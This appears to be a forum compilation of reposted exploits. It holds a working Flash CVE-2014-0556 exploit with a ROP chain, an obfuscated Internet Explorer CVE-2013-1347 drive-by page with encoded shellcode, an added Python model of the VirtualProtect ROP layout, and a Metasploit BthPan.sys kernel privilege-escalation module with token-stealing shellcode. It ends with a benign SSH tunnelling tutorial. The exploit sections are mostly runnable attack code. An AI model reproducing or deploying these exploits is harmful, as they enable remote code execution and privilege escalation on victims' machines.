eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d63049 cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304a cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304b cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304c cc              int     3
*/

package
{
    import flash.events.*
    import flash.media.*
    import flash.display.*
    import flash.geom.*
    import flash.utils.*
    import flash.text.*
    import flash.external.ExternalInterface

    public class Main extends Sprite
    {
        private var i0:uint
        private var i1:uint
        private var i2:uint
        private var i3:uint
        private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145")
        private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
        private var ob:Vector.<Object> = new Vector.<Object>(6400)
        private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
        private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
        private var snd:Sound
        private var vector:uint
        private var vtable:uint
        private var flash:uint

        public function Main():void
        {
            for (i0 = 0; i0 < 3200; i0++) {
                ba[i0] = new ByteArray()
                ba[i0].length = 0x2000
                ba[i0].position = 0xfffff000
            }
            for (i0 = 0; i0 < 3200; i0++) {
                if (i0 % 2 == 0) ba[i0] = null
                ob[i0 * 2] = new Vector.<uint>(1008)
                ob[i0 * 2 + 1] = new Vector.<uint>(1008)
            }
            bitmap.copyPixelsToByteArray(rect, ba[1601])
            for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break
            ob[i0][1024 * 3 - 2] = 0xffffffff
            for (i1 = 0; ; i1++) {
                if (i0 == i1) continue
                if (ob[i1].length != 1008) break
            }
            ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
            ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
            ob[i0].fixed = true
            for (i2 = 1000; ; i2++) {
                if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 &&
                    ob[i1][0xFFFFFFFF - i2 + 10] == 1 &&
                    ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) {
                    vector = ob[i1][0xFFFFFFFF - i2 + 11]
                    break
                } else if (ob[i1][i2 + 0] == 0 &&
                    ob[i1][i2 + 10] == 1 &&
                    ob[i1][i2 + 5] == ob[i1][i2 + 15]) {
                    vector = ob[i1][i2 + 11]
                    break
                }
            }
            snd = new Sound()
            for (i2 = 0; i2 < 6400; i2++) {
                if (i2 == i0 || i2 == i1) continue
                ob[i2] = null
                ob[i2] = new Vector.<Object>(1014)
                ob[i2][0] = snd
                ob[i2][1] = snd
            }
            for (i2 = 0; ; i2++) {
                if (ob[i0][i2 + 0] == 1014 &&
                    ob[i0][i2 + 1] == ob[i0][i2 + 2] &&
                    ob[i0][i2 + 3] == 1
                ) {
                    vtable = read(ob[i0][i2 + 1] - 1)
                    flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx
                    write(ob[i0][i2 + 1] - 1, vector + 0xf54)
                    for (i3 = 0; i3 < 1008; i3++) {
                        ob[i0][i3] = 0x41414100 | i3
                    }
                    ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN
                    ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes
                    ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN
                    ob[i0][3] = 0x00000201 // 0x00000201
                    ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN
                    ob[i0][5] = 0x00000040 // 0x00000040
                    ob[i0][6] = flash + 0x00691119 // POP ECX # RETN
                    ob[i0][7] = vector + 2000 // Writable location
                    ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN
                    ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP)
                    ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN
                    ob[i0][11] = flash + 0x0000d83f // JMP [EAX]
                    ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN
                    ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect()
                    ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN
                    ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp'
                    ob[i0][16] = 0xcccccccc // shellcode
                    ob[i0][17] = 0xcccccccc // shellcode
                    ob[i0][18] = 0xcccccccc // shellcode
                    ob[i0][19] = 0xcccccccc // shellcode
                    ob[i0][979] = flash + 0x0029913A // POP EAX # RETN
                    ob[i0][980] = 0x00000f58
                    ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN
                    ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN
                    ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN
                    ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN
                    break
                }
            }
            ob[i1][0xFFFFFFFE - 1024 * 3] = 4096
            ob[i0][1024 * 3 - 2] = 0
            str += flash.toString(16)
            var tf:TextField = new TextField();
            tf.width = 800;
            tf.height = 800;
            tf.text = str;
            addChild(tf)
            if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit)
        }

        private function write(addr:uint, data:uint):void
        {
            ob[i0][(addr - vector) / 4 - 2] = data
        }

        private function read(addr:uint):uint
        {
            return ob[i0][(addr - vector) / 4 - 2]
        }

        private function zeroPad(number:String, width:int):String
        {
            if (number.length < width) return "0" + zeroPad(number, width-1)
            return number
        }

        public function exploit():void
        {
            snd.toString()
        }
    }
}

Source: [ActionScript 3] CVE-2014-0556 - Pastebin.com
-
MSIE Use After Free EXP/CVE-2013-1347 (http://pastebin.com/JN2GiB8n)

<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
<script>
pRESSURA = eval('unescape');
fAHPARIC = CollectGarbage;
dISCESA = '%u';

function rIGUARDI(rEPLACEMENT) {
    return pRESSURA(dISCESA + rEPLACEMENT.substring(4, 8) + dISCESA + rEPLACEMENT.substring(0, 4));
}

function vILMENTE(tRIPARTITO) {
    rAPPACIATI = (tRIPARTITO >>> 24).toString((0x10));
    if (rAPPACIATI.length == 0x1) rAPPACIATI = "0" + rAPPACIATI;
    mOSTRARTI = ((tRIPARTITO >>> 16) & (0xff)).toString((0x10));
    if (mOSTRARTI.length == 0x1) mOSTRARTI = "0" + mOSTRARTI;
    tERRENE = ((tRIPARTITO >>> 8) & (0xff)).toString((0x10));
    if (tERRENE.length == 0x1) tERRENE = "0" + tERRENE;
    pRINCIPIO = (tRIPARTITO & (0xff)).toString((0x10));
    if (pRINCIPIO.length == 0x1) pRINCIPIO = "0" + pRINCIPIO;
    return rAPPACIATI + mOSTRARTI + tERRENE + pRINCIPIO;
}

function ue(dw) {
    return rIGUARDI(vILMENTE(dw));
}

function setc() {
    var Then = new Date()
    Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3)
    document.cookie = "Cookie1=fucktheothers;expires=" + Then.toGMTString()
}

function readc() {
    var cookieString = new String(document.cookie);
    if (cookieString.indexOf("fucktheothers") == -1) {
        return 0
    } else {
        return 1;
    }
}

function DropPayload() {
    // en = 77c10000
    // kr = 77bc0000
    // offset = 50000
    var r = "";
    r+= ue( 0x77bd4cfa ); // # POP EBP # RETN [msvcrt.dll]
    r+= ue( 0x77bd4cfa ); // # skip 4 bytes [msvcrt.dll]
    r += ue( 0x77BFFA1C); // # POP EBX # RETN [msvcrt.dll]
    r += ue( 0xffffffff ); // # EBX 0xffffffff (inc 201)
    for(i=0;i<=0x201;i++) {
        r += ue( 0x7d710b7e ); // # INC EBX # RETN [shell32.dll]
    }
    r+= ue( 0x77be4de1 ); // # POP EAX # RETN [msvcrt.dll]
    r+= ue( 0x2cfe04a7 ); // # put delta into eax (-> put += 0x00000040 into edx)
    r+= ue( 0x77bfeb80 ); // # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
    r+= ue(
         0x77c08fbc ); // # XCHG EAX,EDX # RETN [msvcrt.dll]
    r+= ue( 0x77bde33f ); // # POP ECX # RETN [msvcrt.dll]
    r+= ue( 0x77c0e062 ); // # &Writable location [msvcrt.dll]
    r+= ue( 0x77bf6116 ); // # POP EDI # RETN [msvcrt.dll]
    r+= ue( 0x77bf7a42 ); // # RETN (ROP NOP) [msvcrt.dll]
    r+= ue( 0x77beb8ba ); // # POP ESI # RETN [msvcrt.dll]
    r+= ue( 0x77bdaacc ); // # JMP [EAX] [msvcrt.dll]
    r+= ue( 0x77beb860 ); // # POP EAX # RETN [msvcrt.dll]
    r+= ue( 0x77bc1120 ); // # ptr to &VirtualProtect() [IAT msvcrt.dll]
    r+= ue( 0x77d03ad9); // # PUSHAD # RETN [user32.dll]
    r+= ue( 0x77c01025 ); // # ptr to 'push esp # ret ' [msvcrt.dll]
    return r;
}

function align_esp() {
    var r= "";
    r += ue(0x77BFD801);
    return r;
}

function xchg_esp() {
    var r="";
    r += ue(0x77BC5ED5);
    return r;
}

function helloWorld() {
    if (readc()) return;
    setc();
    unicorn = unescape("ABCD");
    unicorn2 = unescape("EEEE");
    for (i=0; i < 2; i++) {
        unicorn += unescape("ABCD");
    }
    unicorn += unescape("AB");
    unicorn += DropPayload();
    unicorn += "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\uFFE8\uFFFF\uC2FF\u9158\u8390\u04C4\u498D\u4112\u3180\u8089\u9039\uF775\uDB62\u02BF\uB5FC\u02BF\uBCFD\u8AF1\uDF7C\u02B7\uA9FF\u7C8A\u40BA\uC8C0\uBA24\uBF52\u3786\uA19D\u5FB3\u81FD\u4248\u8A84\uC953\u6662\u56B2\u6EFC\uB7D7\uD702\u8AAD\uEF54\u02B7\uC285\u02B7\u95D7\u548A\u02B7\u028D\u4C8A\uFC4A\uE5FB\uE6E4\uA7E7\uE5ED\u89E5\u49BA\u8AED\uB9C9\u86F1\u02B7\u85C9\u02B7\u95F9\uB724\uC902\u6281\uB785\uC902\uB7BD\uC904\uB7F5\uC902\u1CB5\uBA36\u0343\u61D2\u7609\u7676\u6508\u8889\u8989\uE1DD\u8889\u8989\u5976\uB136\u25AB\u616E\u76E1\u7676\u52BA\u7D02\uDADD\uDFDA\u5976\u0736\u87C7\u6165\u76DD\u7676\u650A\uBF8D\uA50A\uECAD\u5976\uD91C\uBF36\uA693\u61F9\u76B7\u7676\u02D4\uBA7D\uDA52\uDFDA\u8961\u8989\uD689\u4E0A\uDEC3\u61DA\u8989\u8989\u0AD6\u864E\uDCDE\u6502\uC9C9\uC9C9\u76C9\u3669\u7711\u8703\u8461\u7676\u0276\uE37D\uDF89\u8961\u8989\uD689\u4E0A\uDE86\u02DC\uC965\uC9C9\uC9C9\u6976\uF736\u6B51\u61FA\u7763\u7676\u76DA\uE159\uFDFD\uB3F9\uA6A6\uA7B8\uBABB\uA7BD\u
B8B0\uBDA7\uA6BA\uECFA\uFAF1\uF1EC\uECA7\uECF1\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u1989\u1919\u1919\u1919\u1919"; animvalues = align_esp(); for (i=0; i < 0x70/4; i++) { if (i == 0x70/4-1) { animvalues += xchg_esp(); } else { animvalues += align_esp(); } } animvalues += unicorn; for(i = 0; i < 13; i++) { animvalues += ";red"; } f0 = document.createElement('span'); document.body.appendChild(f0); f1 = document.createElement('span'); document.body.appendChild(f1); f2 = document.createElement('span'); document.body.appendChild(f2); document.body.contentEditable="true"; f2.appendChild(document.createElement('datalist')); f1.appendChild(document.createElement('span')); f1.appendChild(document.createElement('table')); try{ f0.offsetParent=null; }catch(e) { }f2.innerHTML=""; f0.appendChild(document.createElement('hr')); f1.innerHTML=""; fAHPARIC(); try { a = document.getElementById('myanim'); a.values = animvalues; } catch(e) {} } </script> </head> <body onload="eval(helloWorld());"> <t:ANIMATECOLOR id="myanim"/> </body> </html> @PhysicalDrive0 [/LIST] Sursa: MSIE Use After Free EXP/CVE-2013-1347 - Pastebin.com
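The Flash chain earlier on this page (ob[i0][0] through ob[i0][15]) and the DropPayload() chain in this post end the same way: load EBX, EDX, ECX, EDI, ESI and EAX, run PUSHAD # RETN so the saved registers become VirtualProtect's frame, and put a 'jmp esp' (Flash) or 'push esp # ret' (IE) right after so execution lands in the shellcode that follows. The windbg dump in the Flash post shows exactly that state when the int3 sled runs: ebx=00000201 (dwSize), esi and edi still holding the JMP [EAX] and RETN gadgets. The following is an added example, mine and not code from either post, that builds that layout and steps through it with a minimal model of the handful of gadget semantics involved, so the register-to-argument mapping and the reason EBP has to be a POP EBP # RETN gadget are visible. The gadget addresses and STACK_BASE are placeholders I chose, not the msvcrt.dll or Flash32 offsets from the posts.

```python
import struct

STACK_BASE = 0x0012f000      # placeholder: where the chain sits once ESP has been pivoted onto it

# Placeholder gadget addresses (assumed; only the roles matter). "iat_virtualprotect"
# is the address of the IAT slot holding VirtualProtect's address, which is why both
# chains use JMP [EAX] rather than JMP EAX.
GADGETS = {
    "pop_ebp":            0x10001000,   # POP EBP # RETN
    "pop_ebx":            0x10001010,   # POP EBX # RETN
    "pop_edx":            0x10001020,   # POP EDX # RETN
    "pop_ecx":            0x10001030,   # POP ECX # RETN
    "pop_edi":            0x10001040,   # POP EDI # RETN
    "pop_esi":            0x10001050,   # POP ESI # RETN
    "pop_eax":            0x10001060,   # POP EAX # RETN
    "ret":                0x10001070,   # RETN (ROP NOP)
    "jmp_eax":            0x10001080,   # JMP [EAX]
    "pushad":             0x10001090,   # PUSHAD # RETN
    "jmp_esp":            0x100010a0,   # JMP ESP ('push esp # ret' behaves the same here)
    "iat_virtualprotect": 0x10002000,   # IAT entry -> VirtualProtect
}


def build_pushad_chain(g: dict, size: int, prot: int, writable: int) -> bytes:
    """Lay the registers out the way both posts do, then PUSHAD # RETN."""
    chain = [
        g["pop_ebp"], g["pop_ebp"],              # EBP: what VirtualProtect returns into
        g["pop_ebx"], size,                      # EBX: dwSize
        g["pop_edx"], prot,                      # EDX: flNewProtect (0x40 = PAGE_EXECUTE_READWRITE)
        g["pop_ecx"], writable,                  # ECX: lpflOldProtect (any writable dword)
        g["pop_edi"], g["ret"],                  # EDI: RETN, the first thing popped after PUSHAD
        g["pop_esi"], g["jmp_eax"],              # ESI: JMP [EAX] -> VirtualProtect
        g["pop_eax"], g["iat_virtualprotect"],   # EAX: &VirtualProtect
        g["pushad"],                             # PUSHAD # RETN
        g["jmp_esp"],                            # executed once VirtualProtect has returned
    ]
    return b"".join(struct.pack("<I", v) for v in chain)


def run_pushad_chain(chain: bytes, g: dict) -> dict:
    """Model just enough x86 to follow the chain: a stack, eight registers, the gadgets
    above, and a stdcall VirtualProtect that records the arguments it was handed."""
    mem = bytearray(chain) + bytearray(0x400)          # chain, then the shellcode area
    regs = dict.fromkeys(("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"), 0)
    regs["esp"] = STACK_BASE
    by_addr = {addr: name for name, addr in g.items()}

    def rd(addr):
        return struct.unpack_from("<I", mem, addr - STACK_BASE)[0]

    def wr(addr, value):
        struct.pack_into("<I", mem, addr - STACK_BASE, value)

    def pop():
        value = rd(regs["esp"])
        regs["esp"] += 4
        return value

    def push(value):
        regs["esp"] -= 4
        wr(regs["esp"], value)

    out = {}
    eip = pop()                                    # the hijacked return lands on chain[0]
    while True:
        name = by_addr[eip]
        if name.startswith("pop_"):
            regs[name[4:]] = pop()
        elif name == "pushad":                     # pushes EAX,ECX,EDX,EBX,ESP(original),EBP,ESI,EDI
            orig_esp = regs["esp"]
            for r in ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"):
                push(orig_esp if r == "esp" else regs[r])
        elif name == "jmp_eax":                    # [EAX] is VirtualProtect: no return address pushed
            assert regs["eax"] == g["iat_virtualprotect"]
            ret_addr = pop()                       # stdcall: return address, then 4 args, callee cleans
            out.update(lpAddress=pop(), dwSize=pop(), flNewProtect=pop(), lpflOldProtect=pop())
            eip = ret_addr
            continue
        elif name == "jmp_esp":
            out["eip"] = regs["esp"]               # control lands right after the chain
            return out
        eip = pop()                                # every other gadget ends in RETN


if __name__ == "__main__":
    chain = build_pushad_chain(GADGETS, size=0x201, prot=0x40, writable=0x10009000)
    print({k: hex(v) for k, v in run_pushad_chain(chain, GADGETS).items()})
```

Walking it through: after PUSHAD the stack reads EDI, ESI, EBP, ESP, EBX, EDX, ECX, EAX; RETN eats EDI (the ROP NOP), the next RETN eats ESI (JMP [EAX]), and VirtualProtect then sees EBP as its return address and the saved ESP, EBX, EDX and ECX as lpAddress, dwSize, flNewProtect and lpflOldProtect. Its `ret 0x10` leaves ESP on the saved EAX slot, which is why EBP must be POP EBP # RETN: it discards that slot and returns into the 'jmp esp' gadget, whose target is the shellcode immediately after the chain, inside the region that was just made executable.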
-
[h=1]Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation[/h]

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
      'Description'    => %q{
        A vulnerability within Microsoft Bluetooth Personal Area Networking module, BthPan.sys,
        can allow an attacker to inject memory controlled by the attacker into an arbitrary
        location. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute
        arbitrary code by subsequently calling NtQueryIntervalProfile.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
          'Jay Smith <jsmith[at]korelogic.com>'   # MSF module
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Targets'        =>
        [
          ['Windows XP SP3',
            {
              'HaliQuerySystemInfo' => 0x16bba,
              '_KPROCESS'           => "\x44",
              '_TOKEN'              => "\xc8",
              '_UPID'               => "\x84",
              '_APLINKS'            => "\x88"
            }
          ]
        ],
      'References'     =>
        [
          [ 'CVE', '2014-4971' ],
          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],
          [ 'OSVDB', '109387' ]
        ],
      'DisclosureDate' => 'Jul 18 2014',
      'DefaultTarget'  => 0
    ))
  end

  def ring0_shellcode
    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
    tokenswap << "\x8B\x40\x44\x50\xBB\x04"
    tokenswap << "\x00\x00\x00\x8B\x80\x88"
    tokenswap << "\x00\x00\x00\x2D\x88"
    tokenswap << "\x00\x00\x00\x39\x98\x84"
    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
    tokenswap << [session.sys.process.getpid].pack('V')
    tokenswap << "\x8B\x80\x88\x00\x00\x00"
    tokenswap << "\x2D\x88\x00\x00\x00"
    tokenswap << "\x39\x98\x84\x00\x00\x00"
    tokenswap << "\x75\xED\x89\xB8\xC8"
    tokenswap << "\x00\x00\x00\x61\xC3"
  end

  def fill_memory(proc, address, length, content)
    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

    unless proc.memory.writable?(address)
      vprint_error("Failed to allocate memory")
      return nil
    end
    vprint_good("#{address} is now writable")

    result = proc.memory.write(address, content)
    if result.nil?
      vprint_error("Failed to write contents to memory")
      return nil
    end
    vprint_good("Contents successfully written to 0x#{address.to_s(16)}")

    return address
  end

  def disclose_addresses(t)
    addresses = {}

    hal_dispatch_table = find_haldispatchtable
    return nil if hal_dispatch_table.nil?
    addresses['halDispatchTable'] = hal_dispatch_table
    vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")

    vprint_status('Getting the hal.dll base address...')
    hal_info = find_sys_base('hal.dll')
    if hal_info.nil?
      vprint_error('Failed to disclose hal.dll base address')
      return nil
    end
    hal_base = hal_info[0]
    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")

    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
    addresses['HaliQuerySystemInfo'] = hali_query_system_information
    vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")

    addresses
  end

  def check
    if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    os = sysinfo["OS"]
    return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return Exploit::CheckCode::Safe unless handle

    session.railgun.kernel32.CloseHandle(handle)
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
    end

    my_target = targets[0]

    print_status("Disclosing the HalDispatchTable address...")
    # (part of the original module between this line and the next is missing from the pasted copy)
    @addresses["halDispatchTable"] + 0x4, 0)
    session.railgun.kernel32.CloseHandle(handle)

    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
    session.railgun.ntdll.NtQueryIntervalProfile(2, 4)

    print_status("Checking privileges after exploitation...")
    unless is_system?
      fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
    end
    print_good("Privilege escalation successful!")

    p = payload.encoded
    print_status("Injecting #{p.length} bytes to memory and executing it...")
    unless execute_shellcode(p)
      fail_with(Failure::Unknown, "Error while executing the payload")
    end
  end
end

Source: http://www.exploit-db.com/exploits/34982/
-
SSH tunnel

simple port forwarding (SSH tunneling)

This example creates a tunnel for HTTP. This will forward port 80 of your localhost to port 80 of www.example.com.

    ssh -f -N -q -L 80:localhost:80 username@www.example.com

This example creates a tunnel for IMAP. Here we forward port 1143 on localhost to 143 (IMAP) on imap.example.com.

    ssh -f -N -q -L 1143:localhost:143 username@imap.example.com

    -f  tells ssh to go into the background (daemonize).
    -N  tells ssh that you don't want to run a remote command. That is, you only want to forward ports.
    -q  tells ssh to be quiet
    -L  specifies the port forwarding

port forwarding through an intermediary

You can have the remote machine forward ports to a third machine. This is useful where you have your local machine outside a firewall; a visible machine on the DMZ; and a third machine invisible to the outside.

This creates a tunnel from your localhost port 81 to 192.168.1.69 port 80 through dmz.example.com. This lets you see the web server from outside a LAN.

    ssh -f -N -q -L 81:192.168.1.69:80 username@dmz.example.com

This example creates a tunnel for SSH itself, over localhost port 2222.

    ssh -f -N -q -L 2222:target-host.example.com:22 username@dmz.example.com

This example creates a tunnel for IMAP. Here we forward port 1143 on localhost to 143 (IMAP) on 192.168.1.100 through dmz.example.com.

    ssh -f -N -q -L 1143:192.168.1.100:143 username@dmz.example.com

VNC Viewer uses port 5900. This shows a double-hop.

    # localhost --> wan-gateway --> dmz-gateway --> vnc-console
    ssh -L 5900:localhost:5900 root@wan-gateway.example.com
    ssh -L 5900:vnc-console.example.com:5900 root@dmz-gateway.example.com

reverse port forwarding

This is used in the following situation:

  * You have a server inside a private LAN that you want to connect to from the WAN outside.
  * You can't create a NAT and port forwarding on your firewall to map the machine to the outside.
  * You have a server outside that you can connect to from the server inside the LAN.

What this does is create a connection from the server in the LAN to the server outside. Once that connection is established the server outside starts listening on port 2222. All connections to port 2222 are sent back to port 22 of the server in the LAN. Now you can leave this connection running in your office; go home and ssh to your proxy server at port 2222 and you will be connecting to your server inside the LAN on port 22.

    ssh -f -N -q -R 2222:localhost:22 my_name@remote.example.com

tricky reverse forwarding

This allows a server on an internal LAN to expose a service to the outside WAN. For example, I have a database server that will only accept connections from a specific development box. That dev box is inside the firewall. I want to connect to the database from outside the firewall.

    ssh -t -L 5432:localhost:1999 my_name@firewall.example.com ssh -t db_server ssh -t -R 1999:127.0.0.1:5432 my_name@firewall

Using scp through a DMZ gateway to a machine behind a firewall using a tunnel

First you set up port forwarding through an intermediary. This forwards your localhost port 2222 to port 22 on 192.168.1.100. Remember that 192.168.1.100 is not on your local network; 192.168.1.100 is on the LAN network shared with 208.77.188.166.

    ssh -f -N -q -L 2222:192.168.1.100:22 user@208.77.188.166
    scp -P 2222 transformers.avi user@localhost:.

A diagram might help. Remember, port 22 is the SSH server port on the 192.168.1.100 machine.

    +---------------+        +----------------+        +----------------------+
    | your          |        | remote DMZ     |        | server on remote LAN |
    | local machine |        | server         |        | 192.168.1.100        |
    |               |        | 208.77.188.166 |        |                      |
    |         2222: >--------|                |--------> :22                  |
    |               |        |\______________/|        |                      |
    |               |        |                |        |                      |
    +---------------+        +----------------+        +----------------------+

Other options

    -o ExitOnForwardFailure=yes \
    -o GSSAPIAuthentication=no \
    -o GSSAPIAuthentication=no \
    -o HashKnownHosts=no \
    -o KbdInteractiveAuthentication=no \
    -o PermitLocalCommand=yes \
    -o LocalCommand="logger connected to %h" \
    -o LocalForward=00:remote.example.com:000 \
    -o ExitOnForwardFailure=yes \
    -o NoHostAuthenticationForLocalhost=yes \
    -o ProxyCommand=foo \
    -o RemoteForward=foo \
    -o RequestTTY=yes \
    -o SendEnv=LC_* \
    -o Tunnel=ethernet \
    -o TunnelDevice=any:any \
    -o VerifyHostKeyDNS=yes

SOCKS5 with Firefox

Simple and secure web browsing. You can set up a tunnel as described above or you can use the following technique. This starts SSH on your localhost acting as a SOCKS proxy. Once you start SSH this way you can point any application that supports a SOCKS5 interface to this port. But these instructions will show what you need to do to get Firefox to proxy through SOCKS. Firefox supports SOCKS with no extra add-ons.

Start an ssh connection to a host that you want to proxy through. Use the -D option to specify a SOCKS5 port on your localhost. The port doesn't really matter. You just need to use the same port in your SOCKS client application.

    ssh -D 9999 username@proxy.example.com

In Firefox select "Edit | Preferences | Advanced Tab | Connection Settings button". Then select "Manual proxy configuration". All you need to fill out is "SOCKS Host: Localhost", "Port: 9999", then select "SOCKS v5". It's easy.

This tool can also help in switching the proxy settings on and off: SwitchProxy Tool

Source: SSH tunnel - Noah.org
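To make concrete what the -L option does on the client side, here is a small local TCP forwarder in Python. It is an added example, not code from the Noah.org page and not OpenSSH's implementation: in a real tunnel the relayed bytes travel inside the encrypted SSH channel, whereas here a loopback echo server (constructed for the example) stands in for the remote service. The one security-relevant detail it reproduces is the bind address: like ssh, the listener binds to 127.0.0.1 unless told otherwise, so a forwarded port is not reachable from other hosts unless -g / GatewayPorts or an explicit bind address is used.

```python
"""Minimal TCP port forwarder modelling the client side of `ssh -L`.

Added example (not OpenSSH code and not from the original post). The echo
server below is a constructed stand-in for the remote service.
"""
import socket
import threading


def _pipe(src, dst):
    """Copy bytes src -> dst until EOF, then pass the EOF on with a half-close."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_forwarder(listen_port, target_host, target_port, bind_addr="127.0.0.1"):
    """Listen on bind_addr:listen_port and relay each accepted connection to
    target_host:target_port, i.e. what `ssh -L listen_port:target_host:target_port`
    does on the client. bind_addr defaults to loopback, mirroring ssh: only -g /
    GatewayPorts (or an explicit bind address) exposes the listener to other hosts,
    which is the setting to audit on shared machines. listen_port=0 picks a free
    port. Returns the listening socket so the caller can close it."""
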